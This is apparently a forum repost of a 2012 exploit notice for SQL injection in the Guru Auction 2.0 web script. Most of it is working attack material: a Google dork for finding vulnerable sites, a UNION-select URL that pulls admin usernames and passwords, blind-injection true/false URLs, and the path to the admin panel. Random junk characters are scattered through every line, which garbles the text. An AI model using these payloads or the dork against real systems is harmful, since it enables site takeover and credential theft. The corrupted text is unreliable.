Guru Auction 2.0 Multiple SQL Injection Vulnerabilities. }% |8 |9 o, t
$ P. P! }- |( M# D" g. }8 j作者 : v3n0m5 A2 t- x& ~( n$ ~
应用 : Guru Auction 2.0! J/ f& _" {$ k' l" P( ^
Price : $49$ W7 l: G) y2 l5 }0 X
Vendor : http://www.guruscript.com/5 |, O* V% @8 y4 Q, ]' N
Google Dork : inurl:subcat.php?cate_id= |' [' v- n" h$ N
% m1 D/ V0 w6 r- @! r8 l- `* USQLi p0c:
4 u7 d& M& [& I( D1 D& r6 E$ Q~~~~~~~~~~/ a4 J) M- e( d0 p9 T) p
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--! p# W/ e# s L
$ X2 |# a4 V+ L
, A, N9 A8 U0 c' Q: O! D盲注 p0c:
$ X4 z7 ?( o+ L7 F~~~~~~~~~~$ C! i8 i* v1 P, J' W5 d6 s3 Q
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
# @! A, _( c; R9 Q- fhttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false. T& K# I& h5 _. P; V; Z1 I% r. }! H
$ ?* _, B j4 z$ r8 A3 g3 `
管理登录入口:6 B5 Q, X" k8 ?) L3 o" ]* X
~~~~~~~~~~0 B$ `0 ^% f- \, t& j
http://domain.tld/[path]/admin/
7 C$ e8 o" d* ^' _: O i$ c0 w |
发表于 2012-12-31 09:24:05
收藏
支持
反对